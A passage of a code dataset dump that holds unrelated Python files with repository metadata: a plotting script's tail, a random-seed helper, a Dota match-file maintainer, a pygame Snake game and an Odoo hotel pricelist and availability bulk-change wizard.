\n\npix_phi, pix_theta = np.meshgrid(np.array(all_phi), np.array(all_theta))\nax = plt.subplot(2,1,1)\nax.contourf(pix_phi, pix_theta, all_max_val-all_max_valcomp,\n    zorder = 0, cmap = cm.Greys_r)\nax.scatter(angles[1,:], angles[0,:], c = angles[2,:], zorder = 1)\nax.invert_yaxis()\n\nax = plt.subplot(2,1,2)\nax.contourf(pix_phi, pix_theta, np.sqrt(r_of_maxval), \n    zorder = 0)\nax.scatter(angles[1,:], angles[0,:], c = angles[2,:], zorder = 1)\nax.invert_yaxis()\nplt.show()\n\n\n\n","repo_name":"epolimpio/image_extraction","sub_path":"code_snaps/mip.py","file_name":"mip.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35764009007","text":"\"\"\"Helper functions to set random seeds.\"\"\"\nimport numpy as np\nimport tensorflow as tf\nimport random\nimport os\n\ndef init_seeds(seed,envs=None):\n    \"\"\"Sets random seed.\"\"\"\n    seed = int(seed)\n    if envs is not None:\n        envs_seeds = np.random.SeedSequence(seed).generate_state(len(envs))\n        for idx, env in enumerate(envs):\n            env.seed(int(envs_seeds[idx]))\n    np.random.seed(seed)\n    tf.random.set_seed(seed)\n    random.seed(seed)\n    os.environ['PYTHONHASHSEED'] = str(seed)","repo_name":"jqueeney/robust-safe-rl","sub_path":"robust_safe_rl/common/seeding.py","file_name":"seeding.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"26612085633","text":"import time\r\nimport os\r\nimport yaml\r\nimport json\r\n\r\nfilepath =\"/home/vinay/fsproject2/app/files\"\r\nclass delmain():\r\n    \r\n    counfile = os.path.join(filepath, \"counterfile.txt\")\r\n    midfile = os.path.join(filepath, \"playermatch.txt\")\r\n    indfile = os.path.join(filepath, \"playermatch_index.txt\")\r\n    with open(counfile, \"r+\") as file:\r\n        rstring = file.read()\r\n        rdict = yaml.safe_load(rstring)\r\n        least = 10\r\n        if len(rdict) > 4:\r\n            for i in rdict:\r\n                if i['threshold'] < least:\r\n                    print(i['threshold'])\r\n                    least = i['threshold']\r\n                    bootid = i['mid']\r\n            with open(midfile, \"r+\") as file:\r\n                rstring = file.read()\r\n                rstring = rstring[:-2]\r\n                rstring = '['+rstring+']'\r\n                rlist = yaml.safe_load(rstring)\r\n                for i in rlist:\r\n                    if i['matchid'] == bootid:\r\n                        i['matchid'] = \"*\"\r\n            with open(midfile, \"w+\") as file:\r\n                rstring = json.dumps(rlist, indent=-1)\r\n                file.write(rstring)\r\n","repo_name":"Racketycomic/Dota_Revamped","sub_path":"whileloopers/app/delmaintainer.py","file_name":"delmaintainer.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2645842742","text":"import pygame\r\nimport random\r\nimport time\r\nwhite=(255,255,255)\r\nblack=(0,0,0)\r\nred=(255,0,0)\r\ngreen=(0,255,0)\r\nblue=(0,0,255)\r\npygame.init()\r\ndisplay_height=800\r\ndisplay_width=600\r\ngameDisplay = pygame.display.set_mode((display_height,display_width))\r\nfull_screen=pygame.display.toggle_fullscreen()\r\npygame.display.set_caption('Snakes')\r\nclock=pygame.time.Clock()\r\nfont=pygame.font.SysFont(None,25)\r\ndef snake(snake_width,snakelist):\r\n\tfor xny in snakelist:\r\n\t\tpygame.draw.rect(gameDisplay,green,[xny[0],xny[1],snake_width,snake_width])\r\ndef message_to_screen(msg,colour):\r\n\tscreen_text=font.render(msg,True,colour)\r\n\tgameDisplay.blit(screen_text,[display_height/2,display_width/2])\r\ndef 
gameLoop():\r\n\t\tcount=5\r\n\t\tsnakelist=[]\r\n\t\tcrashed=False\r\n\t\tlead_x=display_height/2\r\n\t\tlead_y=display_width/2\r\n\t\tlead_xchange=0\r\n\t\tlead_ychange=0\r\n\t\tfood_x=random.randrange(0,display_height,10)\r\n\t\tfood_y=random.randrange(0,display_width,10)\r\n\t\tsnake_width=10\r\n\t\tfood_width=30\r\n\t\tfood_counter=0\r\n\t\tgameOver=False\r\n\t\twhile not crashed:\r\n\t\t\tfor XnY in snakelist[:-1]:\r\n\t\t\t\tif XnY == snakehead:\r\n\t\t\t\t\tgameOver=True\r\n\t\t\twhile gameOver==True:\r\n\t\t\t\tmessage_to_screen('You lose, press r to play again or press q to quit.',white)\r\n\t\t\t\tmessage_to_screen('Your final score was {}'.format(food_counter),white)\r\n\t\t\t\tpygame.display.update()\r\n\t\t\t\tfor event in pygame.event.get():\r\n\t\t\t\t\tif event.type==pygame.KEYDOWN:\r\n\t\t\t\t\t\tif event.key==pygame.K_q:\r\n\t\t\t\t\t\t\tcrashed=True\r\n\t\t\t\t\t\t\tgameOver=False\r\n\t\t\t\t\t\telif event.key==pygame.K_r:\r\n\t\t\t\t\t\t\tgameLoop()\r\n\t\t\tfor event in pygame.event.get():\r\n\t\t\t\tif event.type==pygame.QUIT:\r\n\t\t\t\t\tcrashed=True\r\n\t\t\t\telif event.type==pygame.KEYDOWN:\r\n\t\t\t\t\tif event.key==pygame.K_a:\r\n\t\t\t\t\t\tlead_xchange= -snake_width\r\n\t\t\t\t\t\tlead_ychange=0\r\n\t\t\t\t\telif event.key==pygame.K_d:\r\n\t\t\t\t\t\tlead_xchange= snake_width\r\n\t\t\t\t\t\tlead_ychange=0\r\n\t\t\t\t\telif event.key==pygame.K_w:\r\n\t\t\t\t\t\tlead_ychange= -snake_width\r\n\t\t\t\t\t\tlead_xchange=0\r\n\t\t\t\t\telif event.key==pygame.K_s:\r\n\t\t\t\t\t\tlead_ychange= snake_width\r\n\t\t\t\t\t\tlead_xchange=0\r\n\t\t\tif lead_x>=food_x and lead_x<=food_x+food_width:\r\n\t\t\t\tif lead_y>=food_y and lead_y<=food_y+food_width:\r\n\t\t\t\t\tfood_x=random.randrange(0,display_height,food_width)\r\n\t\t\t\t\tfood_y=random.randrange(0,display_width,food_width)\r\n\t\t\t\t\tcount+=0.1\r\n\t\t\t\t\tfood_counter+=1\r\n\t\t\tif lead_x>=display_height or lead_y>=display_width or lead_x==0 or lead_y==0:\r\n\t\t\t\tgameOver=True\r\n\t\t\tlead_x+= lead_xchange\r\n\t\t\tlead_y+= lead_ychange\r\n\t\t\tif len(snakelist)>food_counter:\r\n\t\t\t\tdel snakelist[0]\r\n\t\t\tsnakehead=[]\r\n\t\t\tsnakehead.append(lead_x)\r\n\t\t\tsnakehead.append(lead_y)\r\n\t\t\tsnakelist.append(snakehead)\r\n\t\t\tgameDisplay.fill(black)\r\n\t\t\tpygame.draw.rect(gameDisplay,red,[food_x,food_y,food_width,food_width])\r\n\t\t\tsnake(snake_width,snakelist)\r\n\t\t\tpygame.display.update()\r\n\t\t\tclock.tick(count)\r\n\t\tpygame.quit()\r\n\t\tquit()\r\ngameLoop()\r\n\r\n\r\n","repo_name":"mubelsjedenn/snakegame","sub_path":"Snakegame.py","file_name":"Snakegame.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"888019127","text":"import datetime\n\nfrom odoo import _, api, fields, models\n\n\nclass AvailabilityWizard(models.TransientModel):\n\n _name = \"pms.massive.changes.wizard\"\n _description = \"Wizard for massive changes on Availability Plans & Pricelists.\"\n _check_pms_properties_auto = True\n\n pms_property_ids = fields.Many2many(\n string=\"Property\",\n comodel_name=\"pms.property\",\n default=lambda self: self.env[\"pms.property\"].browse(\n self.env.user.get_active_property_ids()[0]\n ),\n check_pms_properties=True,\n required=True,\n )\n massive_changes_on = fields.Selection(\n string=\"On\",\n selection=[\n (\"pricelist\", \"Pricelist\"),\n (\"availability_plan\", \"Availability Plan\"),\n ],\n default=lambda self: \"availability_plan\"\n if 
self._context.get(\"availability_plan_id\")\n else \"pricelist\"\n if self._context.get(\"pricelist_id\")\n else \"availability_plan\",\n required=True,\n )\n\n availability_plan_ids = fields.Many2many(\n comodel_name=\"pms.availability.plan\",\n string=\"Availability Plan to apply massive changes\",\n check_pms_properties=True,\n )\n\n pricelist_ids = fields.Many2many(\n comodel_name=\"product.pricelist\",\n string=\"Pricelist to apply massive changes\",\n check_pms_properties=True,\n )\n allowed_pricelist_ids = fields.One2many(\n string=\"Allowed pricelists\",\n comodel_name=\"product.pricelist\",\n compute=\"_compute_allowed_pricelist_ids\",\n )\n start_date = fields.Date(\n string=\"From\",\n required=True,\n )\n end_date = fields.Date(\n string=\"To\",\n required=True,\n )\n\n apply_pricelists_on = fields.Selection(\n string=\"Apply pricelists on\",\n selection=[\n (\"room_types\", \"Room Types\"),\n (\"board_services\", \"Board Services\"),\n (\"service\", \"Service\"),\n ],\n default=\"room_types\",\n )\n\n room_type_ids = fields.Many2many(\n comodel_name=\"pms.room.type\",\n string=\"Room Type\",\n check_pms_properties=True,\n compute=\"_compute_room_type_ids\",\n readonly=False,\n store=True,\n )\n\n board_service_room_type_ids = fields.Many2many(\n string=\"Room type's board services\",\n comodel_name=\"pms.board.service.room.type\",\n check_pms_properties=True,\n compute=\"_compute_board_service_room_type_ids\",\n readonly=False,\n store=True,\n )\n\n board_service = fields.Many2one(\n string=\"Board service\",\n comodel_name=\"product.product\",\n check_pms_properties=True,\n domain=\"[('id', 'in',allowed_board_services)]\",\n )\n\n allowed_board_services = fields.Many2many(\n string=\"Allowed services\",\n comodel_name=\"product.product\",\n compute=\"_compute_allowed_board_services\",\n readonly=False,\n store=True,\n )\n service = fields.Many2one(\n string=\"Service\",\n comodel_name=\"product.product\",\n check_pms_properties=True,\n compute=\"_compute_service\",\n readonly=False,\n store=True,\n )\n date_types = fields.Selection(\n string=\"Date types\",\n selection=[\n (\"sale_dates\", \"Sale Dates\"),\n (\"consumption_dates\", \"Consumption Dates\"),\n ],\n default=\"consumption_dates\",\n )\n\n price = fields.Float(string=\"Price\")\n min_quantity = fields.Float(string=\"Min. Quantity\")\n\n min_stay = fields.Integer(\n string=\"Min. Stay\",\n default=0,\n )\n min_stay_arrival = fields.Integer(\n string=\"Min. Stay Arrival\",\n default=0,\n )\n max_stay = fields.Integer(\n string=\"Max. Stay\",\n default=0,\n )\n max_stay_arrival = fields.Integer(\n string=\"Max. Stay Arrival\",\n default=0,\n )\n closed = fields.Boolean(\n string=\"Closed\",\n default=False,\n )\n closed_departure = fields.Boolean(\n string=\"Closed Departure\",\n default=False,\n )\n closed_arrival = fields.Boolean(\n string=\"Closed Arrival\",\n default=False,\n )\n quota = fields.Integer(\n string=\"Quota\",\n help=\"Generic Quota assigned.\",\n default=-1,\n )\n max_avail = fields.Integer(\n string=\"Max. 
Availability\",\n help=\"Maximum simultaneous availability on own Booking Engine.\",\n default=-1,\n )\n apply_on_monday = fields.Boolean(\n string=\"Apply Availability Rule on mondays\",\n default=False,\n )\n apply_on_tuesday = fields.Boolean(\n string=\"Apply Availability Rule on tuesdays\",\n default=False,\n )\n apply_on_wednesday = fields.Boolean(\n string=\"Apply Availability Rule on wednesdays\",\n default=False,\n )\n apply_on_thursday = fields.Boolean(\n string=\"Apply Availability Rule on thursdays\",\n default=False,\n )\n apply_on_friday = fields.Boolean(\n string=\"Apply Availability Rule on fridays\",\n default=False,\n )\n apply_on_saturday = fields.Boolean(\n string=\"Apply Availability Rule on saturdays\",\n default=False,\n )\n apply_on_sunday = fields.Boolean(\n string=\"Apply Availability Rule on sundays\",\n default=False,\n )\n apply_on_all_week = fields.Boolean(\n string=\"Apply Availability Rule for the whole week\",\n default=True,\n )\n apply_min_stay = fields.Boolean(\n string=\"Apply changes to Min. Stay\",\n default=False,\n )\n\n apply_min_stay_arrival = fields.Boolean(\n string=\"Apply changes to Min. Stay Arrival\",\n default=False,\n )\n\n apply_max_stay = fields.Boolean(\n string=\"Apply changes to Max. Stay\",\n default=False,\n )\n\n apply_max_stay_arrival = fields.Boolean(\n string=\"Apply changes to Max. Stay Arrival\",\n default=False,\n )\n\n apply_quota = fields.Boolean(\n string=\"Apply changes to Quota\",\n default=False,\n )\n\n apply_max_avail = fields.Boolean(\n string=\"Apply changes to Max. Avail.\",\n default=False,\n )\n\n apply_closed = fields.Boolean(\n string=\"Apply changes to Closed\",\n default=False,\n )\n\n apply_closed_arrival = fields.Boolean(\n string=\"Apply changes to Closed Arrival\",\n default=False,\n )\n\n apply_closed_departure = fields.Boolean(\n string=\"Apply changes to Closed Departure\",\n default=False,\n )\n\n rules_to_overwrite = fields.One2many(\n string=\"Rule to Overwrite\",\n readonly=True,\n store=False,\n comodel_name=\"pms.availability.plan.rule\",\n compute=\"_compute_rules_to_overwrite\",\n )\n pricelist_items_to_overwrite = fields.One2many(\n string=\"Pricelist Items to Override\",\n readonly=True,\n store=False,\n comodel_name=\"product.pricelist.item\",\n compute=\"_compute_pricelist_items_to_overwrite\",\n )\n num_rules_to_overwrite = fields.Integer(\n string=\"Rules to overwrite on massive changes\",\n readonly=True,\n store=False,\n compute=\"_compute_num_rules_to_overwrite\",\n )\n num_pricelist_items_to_overwrite = fields.Integer(\n string=\"Pricelist items to overwrite on massive changes\",\n compute=\"_compute_num_pricelist_items_to_overwrite\",\n readonly=True,\n store=False,\n )\n avail_readonly = fields.Boolean(\n string=\"Avialability Readonly\",\n default=lambda self: self._default_avail_readonly(),\n )\n pricelist_readonly = fields.Boolean(\n string=\"Pricelist Readonly\",\n default=lambda self: self._default_pricelist_readonly(),\n )\n\n def _default_avail_readonly(self):\n return True if self._context.get(\"availability_plan_id\") else False\n\n def _default_pricelist_readonly(self):\n return True if self._context.get(\"pricelist_id\") else False\n\n @api.depends(\"massive_changes_on\")\n def _compute_allowed_pricelist_ids(self):\n for record in self:\n record.allowed_pricelist_ids = self.env[\"product.pricelist\"].search(\n [\n (\"is_pms_available\", \"=\", True),\n (\"pricelist_type\", \"=\", \"daily\"),\n ]\n )\n\n @api.depends(\"apply_pricelists_on\")\n def 
_compute_room_type_ids(self):\n for record in self:\n if (\n record.apply_pricelists_on == \"board_services\"\n or record.apply_pricelists_on == \"service\"\n ):\n record.room_type_ids = False\n\n @api.depends(\"apply_pricelists_on\", \"board_service\")\n def _compute_board_service_room_type_ids(self):\n for record in self:\n if (\n record.apply_pricelists_on == \"room_types\"\n or record.apply_pricelists_on == \"service\"\n ):\n record.board_service_room_type_ids = False\n record.board_service = False\n else:\n if not record.board_service_room_type_ids:\n allowed_board_service_room_type_ids = []\n all_board_service_room_type_ids = self.env[\n \"pms.board.service.room.type\"\n ].search([])\n if record.board_service:\n for (\n board_service_room_type_id\n ) in all_board_service_room_type_ids:\n if (\n record.board_service\n in board_service_room_type_id.board_service_line_ids.mapped(\n \"product_id\"\n )\n ):\n allowed_board_service_room_type_ids.append(\n board_service_room_type_id.id\n )\n else:\n allowed_board_service_room_type_ids = (\n all_board_service_room_type_ids.ids\n )\n domain = []\n if allowed_board_service_room_type_ids:\n domain.append((\"id\", \"in\", allowed_board_service_room_type_ids))\n record.board_service_room_type_ids = (\n self.env[\"pms.board.service.room.type\"].search(domain)\n if domain\n else False\n )\n\n @api.depends(\"apply_pricelists_on\")\n def _compute_service(self):\n for record in self:\n if (\n record.apply_pricelists_on == \"board_services\"\n or record.apply_pricelists_on == \"room_types\"\n ):\n record.service = False\n\n @api.depends(\"board_service_room_type_ids\")\n def _compute_allowed_board_services(self):\n for record in self:\n if not record.board_service_room_type_ids:\n record.allowed_board_services = (\n self.env[\"pms.board.service.room.type\"]\n .search([])\n .board_service_line_ids.mapped(\"product_id\")\n )\n else:\n product_ids = []\n for bs_room_type_id in record.board_service_room_type_ids:\n tmp_list = bs_room_type_id.board_service_line_ids.mapped(\n \"product_id\"\n ).ids\n\n product_ids = (\n tmp_list\n if not product_ids\n else product_ids\n if record.board_service_room_type_ids\n else list(set(tmp_list) & set(product_ids))\n )\n\n record.allowed_board_services = self.env[\"product.product\"].search(\n [\n (\n \"id\",\n \"in\",\n product_ids,\n )\n ]\n )\n\n def _rules_to_overwrite_by_plans(self, availability_plans):\n self.ensure_one()\n domain = [\n (\"pms_property_id\", \"in\", self.pms_property_ids.ids),\n (\"availability_plan_id\", \"in\", availability_plans.ids),\n ]\n\n if self.room_type_ids:\n domain.append((\"room_type_id\", \"in\", self.room_type_ids.ids))\n if self.start_date:\n domain.append((\"date\", \">=\", self.start_date))\n if self.end_date:\n domain.append((\"date\", \"<=\", self.end_date))\n\n rules = self.env[\"pms.availability.plan.rule\"]\n if self.start_date and self.end_date:\n rules = rules.search(domain)\n if not self.apply_on_all_week and self.start_date and self.end_date:\n week_days_to_apply = (\n self.apply_on_monday,\n self.apply_on_tuesday,\n self.apply_on_wednesday,\n self.apply_on_thursday,\n self.apply_on_friday,\n self.apply_on_saturday,\n self.apply_on_sunday,\n )\n rules = rules.filtered(\n lambda x: week_days_to_apply[x.date.timetuple()[6]]\n )\n\n return rules\n\n @api.depends(\n \"start_date\",\n \"end_date\",\n \"room_type_ids\",\n \"apply_on_monday\",\n \"apply_on_tuesday\",\n \"apply_on_wednesday\",\n \"apply_on_thursday\",\n \"apply_on_friday\",\n \"apply_on_saturday\",\n 
\"apply_on_sunday\",\n \"apply_on_all_week\",\n \"availability_plan_ids\",\n \"apply_quota\",\n \"apply_max_avail\",\n \"apply_min_stay\",\n \"apply_min_stay_arrival\",\n \"apply_max_stay\",\n \"apply_max_stay_arrival\",\n \"apply_closed\",\n \"apply_closed_arrival\",\n \"apply_closed_departure\",\n \"min_stay\",\n \"max_stay\",\n \"min_stay_arrival\",\n \"max_stay_arrival\",\n \"closed\",\n \"closed_arrival\",\n \"closed_departure\",\n \"quota\",\n \"max_avail\",\n )\n def _compute_rules_to_overwrite(self):\n for record in self:\n if not record.availability_plan_ids and self._context.get(\n \"availability_plan_id\"\n ):\n record.availability_plan_ids = [\n (4, self._context.get(\"availability_plan_id\"))\n ]\n record.massive_changes_on = \"availability_plan\"\n\n record.rules_to_overwrite = record._rules_to_overwrite_by_plans(\n record.availability_plan_ids\n )\n\n @api.depends(\n \"start_date\",\n \"end_date\",\n \"room_type_ids\",\n \"board_service_room_type_ids\",\n \"board_service\",\n \"service\",\n \"apply_pricelists_on\",\n \"date_types\",\n \"apply_on_monday\",\n \"apply_on_tuesday\",\n \"apply_on_wednesday\",\n \"apply_on_thursday\",\n \"apply_on_friday\",\n \"apply_on_saturday\",\n \"apply_on_sunday\",\n \"apply_on_all_week\",\n \"pricelist_ids\",\n \"pms_property_ids\",\n )\n def _compute_pricelist_items_to_overwrite(self):\n for record in self:\n if not record.pricelist_ids and self._context.get(\"pricelist_id\"):\n record.pricelist_ids = [(4, self._context.get(\"pricelist_id\"))]\n record.massive_changes_on = \"pricelist\"\n\n if (\n record.pricelist_ids\n and record.start_date\n and record.end_date\n and record.pms_property_ids\n ):\n domain = [\n (\"pricelist_id\", \"in\", record.pricelist_ids.ids),\n \"|\",\n (\"pms_property_ids\", \"=\", False),\n (\"pms_property_ids\", \"in\", record.pms_property_ids.ids),\n ]\n\n if record.date_types == \"sale_dates\":\n domain.append(\n (\n \"date_start\",\n \">=\",\n datetime.datetime.combine(\n record.start_date, datetime.datetime.min.time()\n ),\n )\n )\n domain.append(\n (\n \"date_start\",\n \"<=\",\n datetime.datetime.combine(\n record.end_date, datetime.datetime.max.time()\n ),\n )\n )\n elif record.date_types == \"consumption_dates\":\n domain.append((\"date_start_consumption\", \">=\", record.start_date))\n domain.append((\"date_end_consumption\", \"<=\", record.end_date))\n\n product_ids = self.generate_product_ids_to_filter(\n record.apply_pricelists_on,\n record.room_type_ids,\n record.board_service_room_type_ids,\n record.board_service,\n record.service,\n )\n if product_ids:\n domain.append(\n (\n \"product_id\",\n \"in\",\n product_ids,\n )\n )\n if record.board_service_room_type_ids:\n domain.append(\n (\n \"board_service_room_type_id\",\n \"in\",\n record.board_service_room_type_ids.ids,\n )\n )\n week_days_to_apply = (\n record.apply_on_monday,\n record.apply_on_tuesday,\n record.apply_on_wednesday,\n record.apply_on_thursday,\n record.apply_on_friday,\n record.apply_on_saturday,\n record.apply_on_sunday,\n )\n\n if record.start_date and record.end_date:\n items = self.env[\"product.pricelist.item\"].search(domain)\n if (\n not record.apply_on_all_week\n and record.start_date\n and record.end_date\n ):\n items_filtered = False\n if record.date_types == \"consumption_dates\":\n items_filtered = items.filtered(\n lambda x: x.date_end_consumption\n and week_days_to_apply[\n x.date_end_consumption.timetuple()[6]\n ]\n )\n elif record.date_types == \"sale_dates\":\n items_filtered = items.filtered(\n lambda x: x.date_end\n 
and week_days_to_apply[x.date_end.date().timetuple()[6]]\n )\n record.pricelist_items_to_overwrite = items_filtered\n else:\n record.pricelist_items_to_overwrite = items\n else:\n record.pricelist_items_to_overwrite = False\n else:\n record.pricelist_items_to_overwrite = False\n\n @api.depends(\n \"rules_to_overwrite\",\n )\n def _compute_num_rules_to_overwrite(self):\n for record in self:\n self.num_rules_to_overwrite = len(record.rules_to_overwrite)\n\n @api.depends(\n \"pricelist_items_to_overwrite\",\n )\n def _compute_num_pricelist_items_to_overwrite(self):\n for record in self:\n self.num_pricelist_items_to_overwrite = len(\n record.pricelist_items_to_overwrite\n )\n\n @api.model\n def generate_product_ids_to_filter(\n self,\n apply_pricelists_on,\n room_type_ids,\n board_service_room_type_ids,\n board_service,\n service,\n ):\n product_ids = False\n all_room_type_ids = self.env[\"pms.room.type\"].search([]).ids\n\n if apply_pricelists_on == \"room_types\":\n room_type_ids = room_type_ids.ids\n if not room_type_ids:\n room_type_ids = all_room_type_ids\n product_ids = (\n self.env[\"pms.room.type\"]\n .search([(\"id\", \"in\", room_type_ids)])\n .mapped(\"product_id\")\n .ids\n )\n elif apply_pricelists_on == \"board_services\":\n if board_service:\n product_ids = [board_service.id]\n elif not board_service_room_type_ids and not board_service:\n product_ids = (\n self.env[\"pms.board.service.room.type\"]\n .search([])\n .board_service_line_ids.mapped(\"product_id\")\n .ids\n )\n else:\n bsrti = board_service_room_type_ids\n product_ids = bsrti.board_service_line_ids.mapped(\"product_id\").ids\n\n elif apply_pricelists_on == \"service\":\n domain = []\n product_ids_board_services = (\n self.env[\"pms.board.service.room.type\"]\n .search([])\n .board_service_line_ids.mapped(\"product_id\")\n .ids\n )\n if product_ids_board_services:\n domain.append((\"id\", \"not in\", product_ids_board_services))\n if service:\n domain.append((\"id\", \"=\", service.id))\n product_ids = self.env[\"product.product\"].search(domain).ids\n\n return product_ids\n\n @api.model\n def generate_dates_vals(\n self,\n date_types,\n vals,\n date,\n ):\n if date_types == \"sale_dates\":\n vals[\"date_start\"] = datetime.datetime.combine(\n date, datetime.datetime.min.time()\n )\n vals[\"date_end\"] = datetime.datetime.combine(\n date, datetime.datetime.max.time()\n )\n else:\n vals[\"date_start_consumption\"] = date\n vals[\"date_end_consumption\"] = date\n return vals\n\n @api.model\n def create_pricelists_items_room_types(\n self,\n room_types,\n pricelist_ids,\n price,\n min_quantity,\n pms_property,\n date,\n date_types,\n ):\n new_items = []\n for room_type in room_types:\n for pricelist in pricelist_ids:\n vals = {\n \"pricelist_id\": pricelist.id,\n \"compute_price\": \"fixed\",\n \"applied_on\": \"0_product_variant\",\n \"product_id\": room_type.product_id.id,\n \"fixed_price\": price,\n \"min_quantity\": min_quantity,\n \"pms_property_ids\": [pms_property.id],\n }\n vals = self.generate_dates_vals(date_types, vals, date)\n\n pricelist_item = self.env[\"product.pricelist.item\"].create(vals)\n new_items.append(pricelist_item.id)\n return new_items\n\n @api.model\n def create_pricelists_items_board_services(\n self,\n board_service_room_type_ids,\n pricelist_ids,\n board_service,\n price,\n min_quantity,\n pms_property,\n date_types,\n date,\n ):\n new_items = []\n for bs_room_type in board_service_room_type_ids:\n for pricelist in pricelist_ids:\n if board_service:\n vals = {\n \"pricelist_id\": 
pricelist.id,\n \"compute_price\": \"fixed\",\n \"applied_on\": \"0_product_variant\",\n \"product_id\": board_service.id,\n \"board_service_room_type_id\": bs_room_type.id,\n \"fixed_price\": price,\n \"min_quantity\": min_quantity,\n \"pms_property_ids\": [pms_property.id],\n }\n vals = self.generate_dates_vals(date_types, vals, date)\n\n pricelist_item = self.env[\"product.pricelist.item\"].create(vals)\n new_items.append(pricelist_item.id)\n\n else:\n for (\n board_service_line\n ) in bs_room_type.pms_board_service_id.board_service_line_ids:\n vals = {\n \"pricelist_id\": pricelist.id,\n \"compute_price\": \"fixed\",\n \"applied_on\": \"0_product_variant\",\n \"product_id\": board_service_line.product_id.id,\n \"board_service_room_type_id\": bs_room_type.id,\n \"fixed_price\": price,\n \"min_quantity\": min_quantity,\n \"pms_property_ids\": [pms_property.id],\n }\n vals = self.generate_dates_vals(date_types, vals, date)\n\n pricelist_item = self.env[\"product.pricelist.item\"].create(vals)\n new_items.append(pricelist_item.id)\n return new_items\n\n @api.model\n def create_availability_plans_rules(\n self,\n room_types,\n availability_plan_ids,\n min_stay,\n apply_min_stay,\n min_stay_arrival,\n apply_min_stay_arrival,\n max_stay,\n apply_max_stay,\n max_stay_arrival,\n apply_max_stay_arrival,\n quota,\n apply_quota,\n max_avail,\n apply_max_avail,\n closed,\n apply_closed,\n closed_arrival,\n apply_closed_arrival,\n closed_departure,\n apply_closed_departure,\n date,\n rules_to_overwrite,\n pms_property,\n ):\n new_items = []\n for room_type in room_types:\n for avail_plan_id in availability_plan_ids:\n vals = {}\n vals.update({\"min_stay\": min_stay} if apply_min_stay else {})\n vals.update(\n {\"min_stay_arrival\": min_stay_arrival}\n if apply_min_stay_arrival\n else {}\n )\n vals.update({\"max_stay\": max_stay} if apply_max_stay else {})\n\n vals.update(\n {\"max_stay_arrival\": max_stay_arrival}\n if apply_max_stay_arrival\n else {}\n )\n vals.update({\"quota\": quota} if apply_quota else {})\n vals.update({\"max_avail\": max_avail} if apply_max_avail else {})\n\n vals.update({\"closed\": closed} if apply_closed else {})\n vals.update(\n {\"closed_arrival\": closed_arrival} if apply_closed_arrival else {}\n )\n vals.update(\n {\"closed_departure\": closed_departure}\n if apply_closed_departure\n else {}\n )\n\n if date in rules_to_overwrite.mapped(\n \"date\"\n ) and room_type in rules_to_overwrite.mapped(\"room_type_id\"):\n overwrite = rules_to_overwrite.filtered(\n lambda x: x.room_type_id == room_type\n and x.date == date\n and x.pms_property_id.id == pms_property.id\n )\n overwrite.write(vals)\n new_items += overwrite.ids\n else:\n plan_rule = self.env[\"pms.availability.plan.rule\"].create(\n {\n \"availability_plan_id\": avail_plan_id.id,\n \"date\": date,\n \"room_type_id\": room_type.id,\n \"quota\": quota,\n \"max_avail\": max_avail,\n \"min_stay\": min_stay,\n \"min_stay_arrival\": min_stay_arrival,\n \"max_stay\": max_stay,\n \"max_stay_arrival\": max_stay_arrival,\n \"closed\": closed,\n \"closed_arrival\": closed_arrival,\n \"closed_departure\": closed_departure,\n \"pms_property_id\": pms_property.id,\n }\n )\n new_items.append(plan_rule.id)\n\n return new_items\n\n def continue_massive_changes(self):\n self.apply_massive_changes()\n return {\n \"name\": _(\"Massive changes on Pricelist and Availability Plans\"),\n \"res_model\": \"pms.massive.changes.wizard\",\n \"type\": \"ir.actions.act_window\",\n \"view_id\": self.env.ref(\"pms.massive_changes_wizard\").id,\n 
\"target\": \"new\",\n \"view_mode\": \"form\",\n \"context\": {\n \"default_massive_changes_on\": self.massive_changes_on,\n \"default_start_date\": self.start_date,\n \"default_end_date\": self.end_date,\n \"default_pms_property_ids\": [(6, 0, self.pms_property_ids.ids)],\n \"default_pricelist_ids\": [(6, 0, self.pricelist_ids.ids)],\n \"default_availability_plan_ids\": [\n (6, 0, self.availability_plan_ids.ids)\n ],\n },\n }\n\n def save_and_close(self):\n items = self.apply_massive_changes()\n if self.massive_changes_on == \"pricelist\" and not self.pricelist_readonly:\n action = {\n \"view\": self.env.ref(\"pms.product_pricelist_item_action2\").read()[0]\n }\n action[\"view\"][\"domain\"] = [(\"id\", \"in\", items)]\n return action[\"view\"]\n\n if self.massive_changes_on == \"availability_plan\" and not self.avail_readonly:\n action = {\n \"view\": self.env.ref(\n \"pms.availability_plan_rule_view_tree_action\"\n ).read()[0]\n }\n action[\"view\"][\"domain\"] = [(\"id\", \"in\", items)]\n return action[\"view\"]\n\n def apply_massive_changes(self):\n self.ensure_one()\n self.pricelist_items_to_overwrite.unlink()\n week_days_to_apply = (\n self.apply_on_monday,\n self.apply_on_tuesday,\n self.apply_on_wednesday,\n self.apply_on_thursday,\n self.apply_on_friday,\n self.apply_on_saturday,\n self.apply_on_sunday,\n )\n\n # dates between start and end (both included)\n items = []\n for date in [\n self.start_date + datetime.timedelta(days=x)\n for x in range(0, (self.end_date - self.start_date).days + 1)\n ]:\n\n if (\n not self.apply_on_all_week\n and not week_days_to_apply[date.timetuple()[6]]\n ):\n continue\n\n if not self.room_type_ids:\n room_types = self.env[\"pms.room.type\"].search(\n [\n \"|\",\n (\"pms_property_ids\", \"=\", False),\n (\"pms_property_ids\", \"in\", self.pms_property_ids.ids),\n ]\n )\n else:\n room_types = self.room_type_ids\n\n for pms_property in self.pms_property_ids:\n if (\n self.massive_changes_on == \"pricelist\"\n and self.apply_pricelists_on == \"room_types\"\n ):\n new_items = self.create_pricelists_items_room_types(\n room_types,\n self.pricelist_ids,\n self.price,\n self.min_quantity,\n pms_property,\n date,\n self.date_types,\n )\n items = items + new_items if new_items else items\n\n elif (\n self.massive_changes_on == \"pricelist\"\n and self.apply_pricelists_on == \"board_services\"\n ):\n new_items = self.create_pricelists_items_board_services(\n self.board_service_room_type_ids,\n self.pricelist_ids,\n self.board_service,\n self.price,\n self.min_quantity,\n pms_property,\n self.date_types,\n date,\n )\n items = items + new_items if new_items else items\n\n elif (\n self.massive_changes_on == \"pricelist\"\n and self.apply_pricelists_on == \"service\"\n ):\n for 